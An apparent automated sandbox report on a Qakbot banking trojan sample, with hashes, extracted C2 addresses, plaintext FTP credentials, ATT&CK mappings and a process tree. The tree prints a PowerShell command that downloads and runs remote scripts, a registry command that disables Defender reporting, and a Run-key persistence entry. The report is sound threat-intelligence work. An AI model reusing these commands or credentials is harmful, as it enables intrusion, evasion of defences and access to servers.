qakbot | 5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

Analysis

max time kernel
150s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10-05-2024 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Size

596KB
MD5

310e65a59d3c670bc2bededf7ddef03e
SHA1

77153c24512610f9ff8e00bf944a9fee8c8f2974
SHA256

5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512

b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
SSDEEP

6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT

Score

10^/10

qakbot mc06 1527585056 banker execution persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.358

Botnet

mc06

Campaign

1527585056

Credentials

Protocol: ftp
Host:
37.60.244.211
Port:
21
Username:
[email protected]
Password:
4AsEzIaMwi2d

Protocol: ftp
Host:
198.38.77.162
Port:
21
Username:
[email protected]
Password:
kJm6DKVPfyiv

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

71.168.229.249:995

216.21.168.27:32101

216.218.74.196:443

46.177.55.119:443

66.222.48.40:443

93.108.180.227:443

47.40.29.239:443

184.180.157.203:2222

47.40.208.189:443

71.168.229.249:443

216.93.143.182:995

98.16.70.197:2222

75.127.141.50:995

96.248.15.254:995

74.87.248.174:2222

75.189.235.216:443

66.42.182.18:995

50.252.93.122:995

105.187.37.52:443

190.137.254.188:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
21	4176	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe

Executes dropped EXE 2 IoCs

pid	Process
1268	aehup.exe
2008	aehup.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gtimv = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Aehupe\\aehup.exe\""	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4176	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	aehup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	aehup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	aehup.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
552	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
5072	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
1268	aehup.exe
1268	aehup.exe
4176	powershell.exe
4176	powershell.exe
4176	powershell.exe
2008	aehup.exe
2008	aehup.exe
2008	aehup.exe
2008	aehup.exe
3636	explorer.exe
3636	explorer.exe
2828	sihost.exe
2828	sihost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe
2976	taskhostw.exe
2976	taskhostw.exe
3432	Explorer.EXE
3432	Explorer.EXE
3572	svchost.exe
3572	svchost.exe
3844	StartMenuExperienceHost.exe
3936	RuntimeBroker.exe
3936	RuntimeBroker.exe
3456	RuntimeBroker.exe
3456	RuntimeBroker.exe
4368	RuntimeBroker.exe
4368	RuntimeBroker.exe
776	TextInputHost.exe
3288	msedge.exe
3288	msedge.exe
3896	msedge.exe
3896	msedge.exe
3764	msedge.exe
4848	msedge.exe
4848	msedge.exe
2968	svchost.exe
2968	svchost.exe
4716	RuntimeBroker.exe
4716	RuntimeBroker.exe
3856	RuntimeBroker.exe
3856	RuntimeBroker.exe
3572	svchost.exe
3572	svchost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe
3636	explorer.exe
3636	explorer.exe
3572	svchost.exe
3572	svchost.exe
3636	explorer.exe
3636	explorer.exe
2968	svchost.exe
2968	svchost.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1268	aehup.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeShutdownPrivilege	3432	Explorer.EXE
Token: SeCreatePagefilePrivilege	3432	Explorer.EXE
Token: SeShutdownPrivilege	3432	Explorer.EXE
Token: SeCreatePagefilePrivilege	3432	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	94
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	94
PID 1112 wrote to memory of 5072	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	94
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	97
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	97
PID 1112 wrote to memory of 1268	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	97
PID 1112 wrote to memory of 1856	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	98
PID 1112 wrote to memory of 1856	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	98
PID 1112 wrote to memory of 4176	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	100
PID 1112 wrote to memory of 4176	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	100
PID 1268 wrote to memory of 2008	1268	aehup.exe	102
PID 1268 wrote to memory of 2008	1268	aehup.exe	102
PID 1268 wrote to memory of 2008	1268	aehup.exe	102
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	103
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	103
PID 1112 wrote to memory of 768	1112	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	103
PID 768 wrote to memory of 552	768	cmd.exe	105
PID 768 wrote to memory of 552	768	cmd.exe	105
PID 768 wrote to memory of 552	768	cmd.exe	105
PID 1268 wrote to memory of 3636	1268	aehup.exe	106
PID 1268 wrote to memory of 3636	1268	aehup.exe	106
PID 1268 wrote to memory of 3636	1268	aehup.exe	106
PID 1268 wrote to memory of 3636	1268	aehup.exe	106
PID 3636 wrote to memory of 2828	3636	explorer.exe	51
PID 3636 wrote to memory of 2828	3636	explorer.exe	51
PID 3636 wrote to memory of 2828	3636	explorer.exe	51
PID 3636 wrote to memory of 2968	3636	explorer.exe	53
PID 3636 wrote to memory of 2968	3636	explorer.exe	53
PID 3636 wrote to memory of 2968	3636	explorer.exe	53
PID 3636 wrote to memory of 2976	3636	explorer.exe	54
PID 3636 wrote to memory of 2976	3636	explorer.exe	54
PID 3636 wrote to memory of 2976	3636	explorer.exe	54
PID 3636 wrote to memory of 3432	3636	explorer.exe	57
PID 3636 wrote to memory of 3432	3636	explorer.exe	57
PID 3636 wrote to memory of 3432	3636	explorer.exe	57
PID 3636 wrote to memory of 3572	3636	explorer.exe	58
PID 3636 wrote to memory of 3572	3636	explorer.exe	58
PID 3636 wrote to memory of 3572	3636	explorer.exe	58
PID 3636 wrote to memory of 3748	3636	explorer.exe	59
PID 3636 wrote to memory of 3748	3636	explorer.exe	59
PID 3636 wrote to memory of 3748	3636	explorer.exe	59
PID 3636 wrote to memory of 3844	3636	explorer.exe	60
PID 3636 wrote to memory of 3844	3636	explorer.exe	60
PID 3636 wrote to memory of 3844	3636	explorer.exe	60
PID 3636 wrote to memory of 3936	3636	explorer.exe	61
PID 3636 wrote to memory of 3936	3636	explorer.exe	61
PID 3636 wrote to memory of 3936	3636	explorer.exe	61
PID 3636 wrote to memory of 4020	3636	explorer.exe	62
PID 3636 wrote to memory of 4020	3636	explorer.exe	62
PID 3636 wrote to memory of 4020	3636	explorer.exe	62
PID 3636 wrote to memory of 3456	3636	explorer.exe	63
PID 3636 wrote to memory of 3456	3636	explorer.exe	63
PID 3636 wrote to memory of 3456	3636	explorer.exe	63
PID 3636 wrote to memory of 4368	3636	explorer.exe	65
PID 3636 wrote to memory of 4368	3636	explorer.exe	65
PID 3636 wrote to memory of 4368	3636	explorer.exe	65
PID 3636 wrote to memory of 776	3636	explorer.exe	76
PID 3636 wrote to memory of 776	3636	explorer.exe	76
PID 3636 wrote to memory of 776	3636	explorer.exe	76
PID 3636 wrote to memory of 3288	3636	explorer.exe	78
PID 3636 wrote to memory of 3288	3636	explorer.exe	78
PID 3636 wrote to memory of 3288	3636	explorer.exe	78
PID 3636 wrote to memory of 3896	3636	explorer.exe	79
PID 3636 wrote to memory of 3896	3636	explorer.exe	79

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2976

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432
- C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    PID:5072
- - C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:1268
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe" /C
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      PID:2008
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3636
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
    3⤵
    PID:1856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\mharlqxsphmtnmrgcqbpshzjhd.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\SysWOW64\PING.EXE
      ping.exe -n 6 127.0.0.1
      4⤵
      Runs ping.exe
      PID:552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3936

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3456

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4368

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbfd89ceb8,0x7ffbfd89cec4,0x7ffbfd89ced0
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2404,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:8
  2⤵
  PID:3632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8
  2⤵
  PID:1572

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:4896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
47KB

MD5
11b47e74dc0dcb35df32bd7eda4bafa9

SHA1
f7712ef8034bf5ebe191a0d1fa0ff2d2c56018fd

SHA256
ef1666a43273ec68e4a04c2274e03a45e2365d4ccae40b70d11542054860f8cd

SHA512
91b0ffe75a66c12402f7f280bb6fc10456301136263f0d7a36d3544e0746b843dc809b4bea74fdd350475dc76e447b6c56202ce534c3aecbc0698f3652691154

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2shvbiyq.ghu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehu.dat

Filesize
92B

MD5
6bc7e90319080872ea7ba9b18d821155

SHA1
cbe2b2ce9a1267986a672207f7bbdfe067689bc5

SHA256
27eee1a25a4e6ec5f10e408550df291f846ca63ac51ba3d66a5fd0846d8481e6

SHA512
c879842629acdd57bce3a0175e360dd36391f693e057c38e960dea8d7abc345c4f221a27a3070a63ffb1c1010bbd00a780b91afb7595a51e883862f7c77fe6df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup.exe

Filesize
596KB

MD5
310e65a59d3c670bc2bededf7ddef03e

SHA1
77153c24512610f9ff8e00bf944a9fee8c8f2974

SHA256
5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

SHA512
b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Aehupe\aehup32.dll

Filesize
357B

MD5
32ea6b0edb3702440a576ab7c1e8f776

SHA1
401c6c83e558c08b49ba819e6dc66f07dfa5a21b

SHA256
7b102b8219bb1f4bddb398e8e4405811bb5a29afc6b31506dfb83fcc2dcbc455

SHA512
2c98beedadbd5d2989944687c575ba8d64db21aa8b406e967153978cc3d19bf3d0378358f4902016a53b11bef3830fd99a884b85ee99d8394a77cc5f3ebe7d68

Download Submit
memory/776-85-0x0000000000330000-0x000000000035C000-memory.dmp

Filesize
176KB

Download
memory/1112-2-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1112-40-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1112-0-0x00000000005C0000-0x00000000005C6000-memory.dmp

Filesize
24KB

Download
memory/1112-32-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1268-18-0x0000000000680000-0x0000000000686000-memory.dmp

Filesize
24KB

Download
memory/1268-42-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2008-41-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2828-46-0x0000000000900000-0x0000000000901000-memory.dmp

Filesize
4KB

Download
memory/2828-47-0x00000000008A0000-0x00000000008CC000-memory.dmp

Filesize
176KB

Download
memory/2968-50-0x00000000008F0000-0x000000000091C000-memory.dmp

Filesize
176KB

Download
memory/2976-53-0x0000000000300000-0x000000000032C000-memory.dmp

Filesize
176KB

Download
memory/3432-56-0x0000000000B00000-0x0000000000B2C000-memory.dmp

Filesize
176KB

Download
memory/3456-79-0x0000000000B00000-0x0000000000B2C000-memory.dmp

Filesize
176KB

Download
memory/3572-59-0x0000000000140000-0x000000000016C000-memory.dmp

Filesize
176KB

Download
memory/3636-64-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-43-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-45-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-62-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-63-0x0000000000A90000-0x0000000000AFA000-memory.dmp

Filesize
424KB

Download
memory/3636-66-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3636-65-0x0000000002890000-0x00000000028BF000-memory.dmp

Filesize
188KB

Download
memory/3748-69-0x0000000000BE0000-0x0000000000C0C000-memory.dmp

Filesize
176KB

Download
memory/3844-71-0x00000000004B0000-0x00000000004DC000-memory.dmp

Filesize
176KB

Download
memory/3856-93-0x00000000003E0000-0x000000000040C000-memory.dmp

Filesize
176KB

Download
memory/3936-74-0x0000000000AD0000-0x0000000000AFC000-memory.dmp

Filesize
176KB

Download
memory/4176-30-0x00007FFC061D0000-0x00007FFC06C91000-memory.dmp

Filesize
10.8MB

Download
memory/4176-29-0x000002A1360A0000-0x000002A1360C2000-memory.dmp

Filesize
136KB

Download
memory/4176-31-0x00007FFC061D0000-0x00007FFC06C91000-memory.dmp

Filesize
10.8MB

Download
memory/4176-19-0x00007FFC061D3000-0x00007FFC061D5000-memory.dmp

Filesize
8KB

Download
memory/4176-39-0x00007FFC061D0000-0x00007FFC06C91000-memory.dmp

Filesize
10.8MB

Download
memory/4368-82-0x0000000000ED0000-0x0000000000EFC000-memory.dmp

Filesize
176KB

Download
memory/4716-90-0x0000000000040000-0x000000000006C000-memory.dmp

Filesize
176KB

Download
memory/5072-8-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/5072-7-0x0000000000610000-0x0000000000616000-memory.dmp

Filesize
24KB

Download